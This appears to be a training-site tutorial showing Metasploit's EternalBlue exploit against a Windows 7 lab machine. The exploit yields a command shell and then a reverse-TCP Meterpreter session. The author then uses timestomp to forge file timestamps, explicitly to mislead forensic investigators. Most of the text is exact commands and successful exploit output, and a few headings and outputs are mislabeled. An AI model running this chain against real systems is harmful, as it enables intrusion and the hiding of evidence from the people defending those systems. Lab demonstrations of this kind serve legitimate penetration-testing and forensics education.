Metasploit can used in various ways for exploiting Windows vulnerabilities. Metasploit, most popular framework for pentester/ security researcher, is capable for attacking any Windows operating system platform. Metasploit gives multiple exploit and modules to test & exploit Windows.

We will show timestomp module in metasploit, in which attacker can change file attributes of any file in Windows machine. File attributes are the metadata associated with files in Windows. Metadata shows the File Create, Modification & write date & time. According to ethical hacking researcher of international institute of cyber security, metasploit has really helped security community in day to day work.

MACE Values

MACE (modified, accessed, created) are recognized as file attributes. It shows the date and time of any file in Windows machines. File attributes are mostly examined by IT administrators for cyber forensics investigations. We will show how timestomp module can be used to change the file attributes of any file in Windows Operating System.

We will use two operating system. On attacker side we will use Kali Linux 2018.4 amd64 .

. And on Victim side we will use Windows 7 Build 7600 64 Bit with Windows Firewall and defender disabled .

with . Open terminal in Kali Linux.

Type msfconsole, so for testing timestomp we will use SMB (Service Message Block) exploit for attacking victim machine. SMB is used in different scenarios like – printer sharing, accessing Windows Remote Services and other services which are associated with SMB.

[email protected]:/home/iicybersecurity/Downloads# msfconsole ____________ [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%] [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] =[ metasploit v4.17.17-dev ] + -- --=[ 1817 exploits - 1031 auxiliary - 315 post ] + -- --=[ 539 payloads - 42 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > options

Type set RHOST 192.168.1.6 – Victim IP Address

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.6 RHOST => 192.168.1.6 msf exploit(windows/smb/ms17_010_eternalblue) > options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.1.6 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target.

Type run

msf exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.1.4:4444 [*] 192.168.1.6:445 - Connecting to target for exploitation. [+] 192.168.1.6:445 - Connection established for exploitation. [+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes) [*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600 [+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.6:445 - Sending all but last fragment of exploit packet [*] 192.168.1.6:445 - Starting non-paged pool grooming [+] 192.168.1.6:445 - Sending SMBv2 buffers [+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.6:445 - Sending final SMBv2 buffers. [*] 192.168.1.6:445 - Sending last fragment of exploit packet! [*] 192.168.1.6:445 - Receiving response from exploit packet [+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.6:445 - Sending egg to corrupted connection. [*] 192.168.1.6:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (192.168.1.4:4444 -> 192.168.1.6:58238) at 2020-01-17 23:50:10 -0500 [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Windowssystem32>cd C:UsersiicsDesktopiicybersecurity cd C:UsersiicsDesktopiicybersecurity C:UsersiicsDesktopiicybersecurity> C:UsersiicsDesktopiicybersecurity>dir dir Volume in drive C has no label. Volume Serial Number is 9E30-BB33 Directory of C:UsersiicsDesktopiicybersecurity 01/18/2020 10:18 AM <DIR> . 01/18/2020 10:18 AM <DIR> .. 01/18/2020 10:19 AM 172 iicybersecurity.rar 01/18/2020 10:18 AM 21 iicybersecurity.txt 01/18/2020 10:18 AM 19 testfile.txt 3 File(s) 212 bytes 2 Dir(s) 40,536,866,816 bytes free

While attacking with metasploit, sometime shell doesn’t respond properly. For solving this issue. Type exit then press enter .

then press . Type y

C:Windowssystem32>exit exit help Meta shell commands =================== Command Description ------- ----------- help Help menu background Backgrounds the current shell session sessions Quickly switch to another session resource Run the commands stored in a file shell Spawn an interactive shell (*NIX Only) download Download files (*NIX Only) upload Upload files (*NIX Only) background Background session 7? [y/N] y msf exploit(windows/smb/ms17_010_eternalblue) >

Here, attacker might need set meterpreter shell. For that type set payload windows/x64/meterpreter/reverse_tcp

Type exploit, this will create meterpreter session to victim machine.

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) > msf exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.4:4444 [*] 192.168.1.6:445 - Connecting to target for exploitation. [+] 192.168.1.6:445 - Connection established for exploitation. [+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes) [*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600 [+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.1.6:445 - Sending all but last fragment of exploit packet [*] 192.168.1.6:445 - Starting non-paged pool grooming [+] 192.168.1.6:445 - Sending SMBv2 buffers [+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.6:445 - Sending final SMBv2 buffers. [*] 192.168.1.6:445 - Sending last fragment of exploit packet! [*] 192.168.1.6:445 - Receiving response from exploit packet [+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.6:445 - Sending egg to corrupted connection. [*] 192.168.1.6:445 - Triggering free of corrupted buffer. [-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 192.168.1.6:445 - Connecting to target for exploitation. [+] 192.168.1.6:445 - Connection established for exploitation. [+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes) [*] 192.168.1.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] 192.168.1.6:445 - 0x00000010 74 65 20 37 36 30 30 te 7600 [+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.1.6:445 - Trying exploit with 17 Groom Allocations. [*] 192.168.1.6:445 - Sending all but last fragment of exploit packet [*] 192.168.1.6:445 - Starting non-paged pool grooming [+] 192.168.1.6:445 - Sending SMBv2 buffers [+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.1.6:445 - Sending final SMBv2 buffers. [*] 192.168.1.6:445 - Sending last fragment of exploit packet! [*] 192.168.1.6:445 - Receiving response from exploit packet [+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.1.6:445 - Sending egg to corrupted connection. [*] 192.168.1.6:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 192.168.1.6 [*] Meterpreter session 8 opened (192.168.1.4:4444 -> 192.168.1.6:55800) at 2020-01-18 00:33:38 -0500 [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > meterpreter >

Type timestomp help

meterpreter > timestomp help Usage: timestomp <file(s)> OPTIONS OPTIONS: -a <opt> Set the "last accessed" time of the file -b Set the MACE timestamps so that EnCase shows blanks -c <opt> Set the "creation" time of the file -e <opt> Set the "mft entry modified" time of the file -f <opt> Set the MACE of attributes equal to the supplied file -h Help banner -m <opt> Set the "last written" time of the file -r Set the MACE timestamps recursively on a directory -v Display the UTC MACE values of the file -z <opt> Set all four attributes (MACE) of the file

Type ls and type cd iicybesecurity

meterpreter > ls Listing: C: ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 4096 dir 2019-08-23 01:33:26 -0400 $Recycle.Bin 40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings 40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs 40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:34 -0500 Program Files 40555/r-xr-xr-x 8192 dir 2019-12-27 02:20:04 -0500 Program Files (x86) 40777/rwxrwxrwx 4096 dir 2019-12-17 05:43:04 -0500 ProgramData Clean.rar 40777/rwxrwxrwx 4096 dir 2020-01-16 06:37:21 -0500 System Volume Information 40555/r-xr-xr-x 4096 dir 2019-08-23 01:33:18 -0400 Users 40777/rwxrwxrwx 16384 dir 2020-01-18 00:38:27 -0500 Windows 40777/rwxrwxrwx 0 dir 2020-01-17 23:48:58 -0500 iicybersecurity 0000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys meterpreter > meterpreter > meterpreter > cd iicybersecurity meterpreter > meterpreter > ls Listing: C:iicybersecurity =========================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 172 fil 2020-01-17 23:49:00 -0500 iicybersecurity.rar 100666/rw-rw-rw- 21 fil 2020-01-17 23:48:31 -0500 iicybersecurity.txt 100666/rw-rw-rw- 19 fil 2020-01-17 23:48:44 -0500 testfile.txt

Type timestomp iicybersecurity.txt -v this command will show the details of the file with its file attributes.

this command will show the details of the file with its file attributes. -v will display the UTC MACE values of the file, which is around 2020-01-17 23:48:XX.

meterpreter > timestomp iicybersecurity.rar -v [*] Showing MACE attributes for iicybersecurity.txt Modified : 2020-01-17 23:48:31 -0500 Accessed : 2020-01-17 23:47:38 -0500 Created : 2020-01-17 23:47:38 -0500 Entry Modified: 2020-01-17 23:58:49 -0500 meterpreter >

From here attacker will change files attributes to confuse IT administrators that none of the files has accessed. As first step followed by IT Admins is always to check the file attributes. In such cases, Digital Forensics courses offered by International Institute of Cyber Security helps IT Administrator understand the procedure to do forensics in case of any such hacking activity.

Changing Accessed Time of File

For changing file attributes type

meterpreter > meterpreter > timestomp iicybersecurity.rar -a "02/11/2008 08:34:08" [*] Setting specific MACE attributes on iicybersecurity.rar meterpreter >

Type timestomp iicybersecurity.rar -v This will change the accessed time of file to 2008-02-11 08:34:08.

meterpreter > timestomp iicybersecurity.rar -v [*] Showing MACE attributes for iicybersecurity.rar Modified : 2020-01-17 23:49:00 -0500 Accessed : 2008-02-11 08:34:08 -0500 Created : 2020-01-17 23:48:58 -0500 Entry Modified: 2020-01-17 23:58:49 -0500

Changing Last Accessed Time

Type timestomp iicybersecurity.rar -c “02/11/2000 08:34:10”

Type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -c "02/11/2000 08:34:10" [*] Setting specific MACE attributes on iicybersecurity.rar meterpreter > meterpreter > meterpreter > timestomp iicybersecurity.rar -v [*] Showing MACE attributes for iicybersecurity.rar Modified : 2020-01-17 23:49:00 -0500 Accessed : 2008-02-11 08:34:08 -0500 Created : 2000-02-11 08:34:10 -0500 Entry Modified: 2020-01-17 23:58:49 -0500

Above shows the creation time of file has changed.

Modifying the Existing Files

Type timestomp iicybersecurity.rar -e “02/05/2014 08:34:10”

Then type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -e "02/05/2014 08:34:10" [*] Setting specific MACE attributes on iicybersecurity.rar meterpreter > meterpreter > timestomp iicybersecurity.rar -v [*] Showing MACE attributes for iicybersecurity.rar Modified : 2020-01-17 23:49:00 -0500 Accessed : 2008-02-11 08:34:08 -0500 Created : 2000-02-11 08:34:10 -0500 Entry Modified: 2014-02-05 08:34:10 -0500

Changing All File Attributes

Type timestomp iicybersecurity.rar -z “02/05/2014 08:34:10”

Then type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -z "02/05/2014 08:34:10" [*] Setting specific MACE attributes on iicybersecurity.rar meterpreter > meterpreter > timestomp iicybersecurity.rar -v [*] Showing MACE attributes for iicybersecurity.rar Modified : 2014-02-05 08:34:10 -0500 Accessed : 2014-02-05 08:34:10 -0500 Created : 2014-02-05 08:34:10 -0500 Entry Modified: 2014-02-05 08:34:10 -0500 meterpreter >